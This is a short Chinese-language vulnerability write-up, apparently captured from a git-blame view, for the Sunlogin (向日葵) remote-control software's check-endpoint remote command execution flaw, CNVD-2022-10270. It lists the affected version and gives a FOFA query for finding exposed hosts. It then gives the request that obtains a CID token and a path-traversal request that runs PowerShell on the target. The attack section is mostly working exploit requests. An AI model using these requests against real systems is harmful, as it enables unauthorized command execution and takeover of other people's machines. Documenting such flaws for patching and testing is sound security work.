2022-05-24 13:56:53 +08:00
|
|
|
|
# 向日葵 check 远程命令执行漏洞 CNVD-2022-10270
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞描述
|
|
|
|
|
|
|
|
|
|
|
|
向日葵通过发送特定的请求获取CID后,可调用 check接口实现远程命令执行,导致服务器权限被获取
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞影响
|
|
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
|
11.0.0.33162
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
## FOFA
|
|
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
|
body="Verification failure"
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞复现
|
|
|
|
|
|
|
|
|
|
|
|
向日葵在开启后会默认在 40000-65535 之间开启某端口
|
|
|
|
|
|
|
2022-12-05 11:09:28 +08:00
|
|
|
|
|
2022-05-24 13:56:53 +08:00
|
|
|
|
|
|
|
|
|
|
发送请求获取CID
|
|
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
|
/cgi-bin/rpc?action=verify-haras
|
|
|
|
|
|
```
|
|
|
|
|
|
|
2022-12-05 11:09:28 +08:00
|
|
|
|
|
2022-05-24 13:56:53 +08:00
|
|
|
|
|
|
|
|
|
|
使用获取到的 verify_string 作为 cookie的 CID字段,进行命令执行
|
|
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
|
/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig
|
|
|
|
|
|
```
|
|
|
|
|
|
|
2022-12-05 11:09:28 +08:00
|
|
|
|
|
